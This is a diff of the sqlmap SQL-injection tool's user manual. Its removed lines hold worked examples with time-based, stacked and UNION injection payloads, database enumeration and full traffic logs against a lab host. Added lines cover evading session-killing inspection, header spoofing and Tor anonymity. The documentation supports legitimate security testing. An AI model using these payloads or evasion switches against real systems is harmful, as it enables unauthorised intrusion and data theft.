    Vice versa, if you provide a HTTP Cookie header with ---cookie switch and the target URL sends an HTTP Set-Cookie -header at any time, sqlmap will ask you which one to use for the following -HTTP requests. +--cookie switch and the target URL sends an HTTP +Set-Cookie header at any time, sqlmap will ask you which set of +cookies to use for the following HTTP requests.

    -sqlmap by default does not URL encode generated cookie injections, +sqlmap by default does not URL-encode generated cookie payloads, but you can force it by using the --cookie-urlencode -switch. Cookie content encoding is not declared by standard in any way, so -it is solely the matter of web application's behaviour. +switch. Cookie content encoding is not declared by HTTP protocol standard +in any way, so it is solely the matter of web application's behaviour.

    Note that also the HTTP Cookie header is tested against SQL -injection if the --level is set to 2 or above. See below -for details. +injection if the --level is set to 2 or above. +Read below for details. HTTP User-Agent header

    -Switches: --user-agent and --random-agent +Switches: --user-agent and --random-agent

    By default sqlmap performs HTTP requests with the following User-Agent @@ -1152,29 +1177,29 @@ sqlmap/0.9 (http://sqlmap.sourceforge.net)

    However, it is possible to fake it with the --user-agent -option. +switch by providing custom User-Agent as the switch argument.

    -Moreover, by providing the --random-agent switch, sqlmap will -randomly select a User-Agent from the -./txt/user-agents.txt textual file and use it for all HTTP -requests within the session. +Moreover, by providing the --random-agent switch, sqlmap +will randomly select a User-Agent from the ./txt/user-agents.txt +textual file and use it for all HTTP requests within the session.

    Some sites perform a server-side check on the HTTP User-Agent header value and fail the HTTP response if a valid User-Agent is -not provided, its value is not expected or its value is blocked by a web +not provided, its value is not expected or is blacklisted by a web application firewall or similar intrusion prevention system. In this case sqlmap will show you a message as follows: -[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent +[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to +force the HTTP User-Agent header with option --user-agent or --random-agent

    Note that also the HTTP User-Agent header is tested against SQL -injection if the --level is set to 3 or above. See below -for details. +injection if the --level is set to 3 or above. +Read below for details. HTTP Referer header @@ -1183,14 +1208,14 @@ for details. Switch: --referer

    -It is possible to fake the HTTP Referer header value with this -option. By default no HTTP Referer header is sent in -HTTP requests. +It is possible to fake the HTTP Referer header value. By default +no HTTP Referer header is sent in HTTP requests if not +explicitly set.

    Note that also the HTTP Referer header is tested against SQL -injection if the --level is set to 3 or above. See below -for details. +injection if the --level is set to 3 or above. +Read below for details. Extra HTTP headers @@ -1205,17 +1230,25 @@ newline and it is much easier to provide them from the configuration INI file. Have a look at the sample sqlmap.conf file for an example. -HTTP Basic, Digest and NTLM authentications +HTTP protocol authentication

    Switches: --auth-type and --auth-cred

    -These options can be used to specify which HTTP authentication type the -web server implements and the valid credentials to be used to perform all -HTTP requests to the target application. -The three valid types are Basic, Digest and NTLM, -while the credentials' syntax is username:password. +These options can be used to specify which HTTP protocol authentication +the web server implements and the valid credentials to be used to perform +all HTTP requests to the target application. + +The three supported HTTP protocol authentication mechanisms are: + + +Basic +Digest +NTLM + + +While the credentials' syntax is username:password.

    Example of valid syntax: @@ -1226,7 +1259,7 @@ $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id= -HTTP Certificate authentication +HTTP protocol certificate authentication

    Switch: --auth-cert @@ -1246,36 +1279,37 @@ chain file. Switches: --proxy, --proxy-cred and --ignore-proxy

    -It is possible to provide an anonymous HTTP(S) proxy address to pass by -the HTTP(S) requests to the target URL. The syntax of HTTP(S) proxy value -is http://url:port. +It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S) +requests to the target URL. The syntax of HTTP(S) proxy value is +http://url:port.

    -You can also pass by your requests through an authenticated HTTP(S) proxy -server, by providing the credentials in the format username:password -to the --proxy-cred switch. +If the HTTP(S) proxy requires authentication, you can provide the +credentials in the format username:password to the +--proxy-cred switch.

    If, for any reason, you need to stay anonymous, instead of passing by a -single known HTTP(S) proxy server, you can configure a together with - on your machine -as explained on the Tor client guide and use the Privoxy daemon, -by default listening on 127.0.0.1:8118, as sqlmap proxy. + (or similar) on +your machine as explained on the Tor client guide and use the Privoxy +daemon, by default listening on 127.0.0.1:8118, as the sqlmap +proxy.

    The switch --ignore-proxy should be used when you want -to run sqlmap against a target part of a local area network skipping -default usage of a system-wide set HTTP(S) proxy server. +to run sqlmap against a target part of a local area network by ignoring +the system-wide set HTTP(S) proxy server setting. -Delay in seconds between each HTTP request +Delay between each HTTP request

    Switch: --delay

    -It is possible to specify a number of seconds to wait between each HTTP(S) +It is possible to specify a number of seconds to hold between each HTTP(S) request. The valid value is a float, for instance 0.5 means half a second. By default, no delay is set. @@ -1290,7 +1324,7 @@ Switch: --timeout It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out. The valid value is a float, for instance 10.5 means ten seconds and a half. -By default 30 seconds are set. +By default 30 seconds are set. Maximum number of retries when the HTTP connection timeouts @@ -1300,7 +1334,7 @@ Switch: --retries

    It is possible to specify the maximum number of retries when the HTTP(S) -connection timeouts. By default it retries up to three times. +connection timeouts. By default it retries up to three times. Filtering targets from provided proxy log using regular expression @@ -1320,19 +1354,39 @@ $ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)" -TODO +Avoid your session to be destroyed after too many unsuccessful requests

    Switches: --safe-url and --safe-freq

    -TODO +Sometimes web applications or inspection technology in between destroys +the session if a certain number of unsuccessful requests is performed. +This might occur during the detection phase of sqlmap or when it exploits +any of the blind SQL injection types. Reason why is that the SQL payload +does not necessarily returns output and might therefore raise a signal to +either the application session management or the inspection technology. + +

    +To bypass this limitation set by the target, you can provide two switches: + + +--safe-url: Url address to visit frequently during +testing. +--safe-freq: Test requests between two visits to a +given safe url. + + +

    +This way, sqlmap will visit every a predefined number of requests a +certain safe URL without performing any kind of injection against +it. Optimization

    -These options can be used to optimize the performance of sqlmap. +These switches can be used to optimize the performance of sqlmap. Bundle optimization @@ -1341,7 +1395,17 @@ These options can be used to optimize the performance of sqlmap. Switch: -o

    -TODO +This switch is an alias that implicitly sets the following: + + +--keep-alive +--null-connection +--threads 4 +--group-concat + + +

    +Read below for details about every single switch. Output prediction @@ -1383,18 +1447,18 @@ This feature relies on the concept and inherits both its pro and its cons.

    -This number comes into play when the brute-force switches are provided or -when the data fetching is done through any of the blind SQL injection -techniques. +This features applies to the brute-force switches and when the data +fetching is done through any of the blind SQL injection techniques. For the latter case, sqlmap first calculates the length of the query -output, then starts the threads. Each thread is assigned to retrieve one -character of the query output. The thread then ends when that character is -retrieved. +output in a single thread, then starts the multi-threading. Each thread is +assigned to retrieve one character of the query output. The thread ends +when that character is retrieved - it takes up to 7 HTTP(S) requests with +the bisection algorithm implemented in sqlmap.

    Note that the multi-threading switch does not affect any other SQL -injection technique and that the maximum number of concurrent requests is -set to 10 for performance and site reliability reasons. +injection technique. The maximum number of concurrent requests is set to +10 for performance and site reliability reasons. MySQL GROUP_CONCAT() speed up @@ -1420,12 +1484,13 @@ Switch: -p

    By default sqlmap tests all GET parameters and POST -parameters. When the value of --level is >= 2 it tests -also HTTP Cookie header values. When this value is >= 3 -it tests also HTTP User-Agent and HTTP Referer header value for SQL injections. +parameters. When the value of --level is >= 2 +it tests also HTTP Cookie header values. When this value is >= +3 it tests also HTTP User-Agent and HTTP Referer +header value for SQL injections. It is however possible to manually specify a comma-separated list of parameter(s) that you want sqlmap to test. This will bypass the dependence -on the value of --level too. +on the value of --level too.

    For instance, to test for GET parameter id and for HTTP @@ -1517,7 +1582,7 @@ user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and suffix.

    -Example on vulnerable source code: +Example of vulnerable source code: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1"; @@ -1586,7 +1651,7 @@ Switch: --risk TODO -Page comparison +TODO: Page comparison

    Switches: --string and --regexp @@ -1614,85 +1679,6 @@ only. This way the distinction will be based upon string presence or regular expression match and not page MD5 hash comparison. -Example on a MySQL 5.0.67 target on a page which content changes -every second due to a call to PHP function time(): - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \ - -v 5 - -[...] -[hh:mm:50] [INFO] testing if the url is stable, wait a few seconds -[hh:mm:50] [TRAFFIC OUT] HTTP request: -GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 -Host: 192.168.136.131 -User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net) -Connection: close - -[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200): -Date: Fri, 25 Jul 2008 14:29:50 GMT -Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 -OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 -X-Powered-By: PHP/5.2.4-2ubuntu5.2 -Connection: close -Transfer-Encoding: chunked -Content-Type: text/html - -<html><body> -<b>SQL results:</b> -<table border="1"> -<tr><td>1</td><td>luther</td><td>blissett</td></tr> -</table> -</body></html><p>Dynamic content: 1216996190</p> - -[hh:mm:51] [TRAFFIC OUT] HTTP request: -GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 -Host: 192.168.136.131 -User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net) -Connection: close - -[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): -Date: Fri, 25 Jul 2008 14:29:51 GMT -Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 -OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 -X-Powered-By: PHP/5.2.4-2ubuntu5.2 -Content-Length: 161 -Connection: close -Content-Type: text/html - -<html><body> -<b>SQL results:</b> -<table border="1"> -<tr><td>1</td><td>luther</td><td>blissett</td></tr> -</table> -</body></html><p>Dynamic content: 1216996191</p> - -[hh:mm:51] [TRAFFIC OUT] HTTP request: -GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 -Host: 192.168.136.131 -User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net) -Connection: close - -[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): -Date: Fri, 25 Jul 2008 14:29:51 GMT -Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 -OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 -X-Powered-By: PHP/5.2.4-2ubuntu5.2 -Content-Length: 161 -Connection: close -Content-Type: text/html - -<html><body> -<b>SQL results:</b> -<table border="1"> -<tr><td>1</td><td>luther</td><td>blissett</td></tr> -</table> -</body></html><p>Dynamic content: 1216996191</p> - -[hh:mm:51] [ERROR] url is not stable, try with --string or --regexp options, refer to -the user's manual paragraph 'Page comparison' for details - -

    As you can see, the string after Dynamic content changes its value every second. In the example it is just a call to PHP @@ -1708,57 +1694,10 @@ on the not injected page content and it is not on the False page content displayed on the page content) and passing it to sqlmap, you are able to inject anyway. -Example on a MySQL 5.0.67 target on a page which content changes -every second due to a call to PHP function time(): - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \ - --string "luther" -v 1 - -[hh:mm:22] [INFO] testing connection to the target url -[hh:mm:22] [INFO] testing if the provided string is within the target URL page content -[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic -[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic -[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic -[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic -[hh:mm:22] [INFO] GET parameter 'id' is dynamic -[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' -[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id' -[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id' -[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable -[hh:mm:22] [INFO] testing for parenthesis on injectable parameter -[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis -[...] - -

    You can also specify a regular expression to match rather than a string if you prefer. -Example on a MySQL 5.0.67 target on a page which content changes -every second due to a call to PHP function time(): - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \ - --regexp "lu[\w][\w]er" -v 1 - -[hh:mm:22] [INFO] testing connection to the target url -[hh:mm:22] [INFO] testing if the provided regular expression matches within the target -URL page content -[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic -[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic -[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic -[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic -[hh:mm:22] [INFO] GET parameter 'id' is dynamic -[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' -[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id' -[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id' -[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable -[hh:mm:22] [INFO] testing for parenthesis on injectable parameter -[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis -[...] - -

    As you can see, when one of these options is specified, sqlmap skips the URL stability test. @@ -1772,392 +1711,40 @@ user's input. Techniques

    -These options can be used to test for specific SQL injection technique or -to use one of them to exploit the affected parameter(s) rather than using -the default blind SQL injection technique. +These options can be used to tweak how specific SQL injection techniques +are tested. -Test for stacked queries (multiple statements) support +Seconds to delay the DBMS response for time-based blind SQL injection

    -Switch: --stacked-test +Switch: --time-sec

    -It is possible to test if the web application technology supports -stacked queries, multiple statements, on the injectable -parameter. +It is possible to set the seconds to delay the response when testing for +time-based blind SQL injection, by providing the +--time-sec option followed by an integer. +By default delay is set to 5 seconds. + +TODO

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" \ - --stacked-test -v 1 - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:15] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id' -stacked queries support: None - +Switch: --union-cols

    -By default PHP builtin function mysql_query() does not support -multiple statements. -Multiple statements is a feature supported by default only by some -web application technologies in relation to the back-end database -management system. For instance, as you can see from the next example, -where PHP does not support them on MySQL, it does on PostgreSQL. +TODO + +TODO

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ - --stacked-test -v 1 - -[...] -back-end DBMS: PostgreSQL - -[hh:mm:01] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id' -stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128' - +Switch: --union-char

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" \ - --stacked-test -v 1 - -[...] -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name' -stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC' - - - -Test for time based blind SQL injection - -

    -Switches: --time-test and --time-sec - -

    -It is possible to test if the target URL is affected by a time based -blind SQL injection vulnerability. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" \ - --time-test -v 1 - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND -condition syntax -[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection -with AND condition syntax -time based blind sql injection payload: 'id=1 AND SLEEP(5) AND 5249=5249' - - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ - --time-test -v 1 - -[...] -back-end DBMS: PostgreSQL - -[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND -condition syntax -[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql -injection with AND condition syntax -[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked -query syntax -[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection -with stacked query syntax -time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644' - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" \ - --time-test -v 1 - -[...] -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with AND -condition syntax -[hh:mm:59] [WARNING] the parameter 'name' is not affected by a time based blind sql -injection with AND condition syntax -[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked -query syntax -[hh:mm:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with -stacked query syntax -time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND -'PmrXn'='PmrXn' - - -

    -It is also possible to set the seconds to delay the response by providing -the --time-sec option followed by an integer. By default delay -is set to five seconds. - - -Test for UNION query SQL injection - -

    -Switches: --union-test and --union-tech - -

    -It is possible to test if the target URL is affected by a UNION query -(inband) SQL injection vulnerability. -Refer to the Techniques section for details on this SQL injection -technique. - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" \ - --union-test -v 1 - -[...] -back-end DBMS: Oracle - -[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing -technique -[hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability -valid union: 'http://192.168.136.131/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT -NULL, NULL, NULL FROM DUAL-- AND 6558=6558' - - -

    -By default sqlmap uses the NULL bruteforcing technique to -detect the number of columns within the original SELECT statement. -It is also possible to change it to ORDER BY clause -bruteforcing with the --union-tech option. - -

    -Further details on these techniques can be found . - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_str.php?id=1" \ - --union-test --union-tech orderby -v 1 - -[...] -back-end DBMS: PostgreSQL - -[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause -bruteforcing technique -[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability -valid union: 'http://192.168.136.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND -1262=1262' - - -

    -As you can see, the target URL parameter id might be also -exploitable by the inband SQL injection technique. -In case a case it is strongly recommended to use this technique which saves -a lot of time. - -

    -It is strongly recommended to run at least once sqlmap with the ---union-test option to test if the affected parameter is used -within a for cycle, or similar, and in case use ---union-use option to exploit this vulnerability because it -saves a lot of time and it does not weight down the web server log file -with hundreds of HTTP requests. - - -Use the UNION query SQL injection - -

    -Switch: --union-use - -

    -Providing the --union-use parameter, sqlmap will first test if -the target URL is affected by an inband SQL injection -(--union-test) vulnerability then, in case it seems to be -vulnerable, it will confirm that the parameter is affected by a Full -UNION query SQL injection and use this technique to go ahead with the -exploiting. -If the confirmation fails, it will check if the parameter is affected by -a Partial UNION query SQL injection, then use it to go ahead if it -is vulnerable. -In case the inband SQL injection vulnerability is not exploitable, sqlmap -will automatically fallback on the blind SQL injection technique to go -ahead. - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 2 \ - --union-use --banner - -[...] -back-end DBMS: Microsoft SQL Server 2000 - -[hh:mm:42] [INFO] fetching banner -[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing -technique -[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability -[hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id' -[hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection -vulnerability -[hh:mm:42] [DEBUG] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+ -CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+ -CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204 -[hh:mm:42] [DEBUG] performed 3 queries in 0 seconds -banner: ---- -Microsoft SQL Server 2000 - 8.00.194 (Intel X86) - Aug 6 2000 00:57:48 - Copyright (c) 1988-2000 Microsoft Corporation - Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ---- - - -

    -As you can see, the vulnerable parameter (id) is affected by both -blind SQL injection and exploitable full inband SQL injection -vulnerabilities. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 5 \ - --union-use --current-user - -[...] -[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql -injection vulnerability -[hh:mm:29] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86), -IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), -NULL# AND 8032=8032 -[hh:mm:29] [TRAFFIC OUT] HTTP request: -GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112 -%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29 -%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND -%208032=8032 HTTP/1.1 -Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 -Host: 192.168.136.131 -Accept-language: en-us,en;q=0.5 -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, -image/png,*/*;q=0.5 -User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net) -Connection: close - -[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200): -Date: Tue, 16 Dec 2008 hh:mm:29 GMT -Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9 -OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 -X-Powered-By: PHP/5.2.6-2ubuntu4 -Content-Length: 194 -Connection: close -Content-Type: text/html - -<html><body> -<b>SQL results:</b> -<table border="1"> -<tr><td>1</td><td>luther</td><td>blissett</td></tr> -<tr><td></td><td>pnyMXVtestuser@localhostHYKMyg</td><td></td></tr> -</table> -</body></html> - -[hh:mm:29] [DEBUG] performed 3 queries in 0 seconds -current user: 'testuser@localhost' - - -

    -As you can see, the MySQL CURRENT_USER() function (--current-user) -output is nested, inband, within the HTTP response page, this makes the -inband SQL injection exploited. - -

    -In case the inband SQL injection is not fully exploitable, sqlmap will -check if it is partially exploitable: this occurs if the query output -is not parsed within a for, or similar, cycle but only the first -entry is displayed in the page content. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_partialunion.php?id=1" -v 2 \ - --union-use --dbs - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:56] [INFO] fetching database names -[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing -technique -[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability -[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id' -[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql -injection vulnerability -[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id' -[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection -vulnerability -[hh:mm:56] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76), -IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL -FROM information_schema.SCHEMATA# AND 1062=1062 -[hh:mm:56] [DEBUG] performed 6 queries in 0 seconds -[hh:mm:56] [INFO] the SQL query provided returns 4 entries -[hh:mm:56] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL( -CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM -information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421 -[hh:mm:56] [DEBUG] performed 7 queries in 0 seconds -[hh:mm:56] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL( -CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM -information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553 -[hh:mm:56] [DEBUG] performed 8 queries in 0 seconds -[hh:mm:56] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL( -CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM -information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805 -[hh:mm:56] [DEBUG] performed 9 queries in 0 seconds -[hh:mm:56] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL( -CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM -information_schema.SCHEMATA LIMIT 3, 1# AND 739=739 -[hh:mm:56] [DEBUG] performed 10 queries in 0 seconds -available databases [4]: -[*] information_schema -[*] mysql -[*] privatedb -[*] testdb - - -

    -As you can see, sqlmap identified that the parameter is affected by a -partial inband SQL injection. Consequently, it counted the number of query -output entries and retrieved them once per time. It forces the parameter -(id) value 1 to its negative value -1 so that -it does not return, presumibly, any output. That leaves our own UNION ALL -SELECT statement to produce one entry at a time and display only it in -the page content. +TODO Fingerprint -Extensive database management system fingerprint +TODO: Extensive database management system fingerprint

    Switches: -f or --fingerprint @@ -2175,22 +1762,6 @@ After identifying an injectable vector, sqlmap fingerprints the back-end database management system and go ahead with the injection with its specific syntax within the limits of the database architecture. -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1 - -[...] -[hh:mm:17] [INFO] testing MySQL -[hh:mm:17] [INFO] confirming MySQL -[hh:mm:17] [INFO] retrieved: 5 -[hh:mm:17] [INFO] the back-end DBMS is MySQL -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: MySQL >= 5.0.0 - -

    As you can see, sqlmap automatically fingerprints the web server operating system and the web application technology by parsing some HTTP response headers. @@ -2200,205 +1771,19 @@ If you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error messages, you can provide the --fingerprint option. -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1 -f - -[...] -[hh:mm:49] [INFO] testing MySQL -[hh:mm:49] [INFO] confirming MySQL -[hh:mm:49] [INFO] retrieved: 3 -[hh:mm:49] [INFO] the back-end DBMS is MySQL -[hh:mm:49] [INFO] retrieved: -[hh:mm:49] [INFO] retrieved: -[hh:mm:49] [INFO] retrieved: t -[hh:mm:49] [INFO] executing MySQL comment injection fingerprint -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2 - comment injection fingerprint: MySQL 5.0.67 - html error message fingerprint: MySQL - - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -v 1 -f - -[...] -[hh:mm:38] [WARNING] the back-end DMBS is not MySQL -[hh:mm:38] [INFO] testing Oracle -[hh:mm:38] [INFO] confirming Oracle -[hh:mm:38] [INFO] the back-end DBMS is Oracle -[hh:mm:38] [INFO] retrieved: 10 -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: active fingerprint: Oracle 10g - html error message fingerprint: Oracle - - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -v 1 -f - -[...] -[hh:mm:14] [WARNING] the back-end DMBS is not Oracle -[hh:mm:14] [INFO] testing PostgreSQL -[hh:mm:14] [INFO] confirming PostgreSQL -[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL -[hh:mm:14] [INFO] retrieved: 2 -[hh:mm:14] [INFO] retrieved: -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0 - html error message fingerprint: PostgreSQL - -

    As you can see from the last example, sqlmap first tested for MySQL, then for Oracle, then for PostgreSQL since the user did not forced the back-end database management system name with option --dbms. -

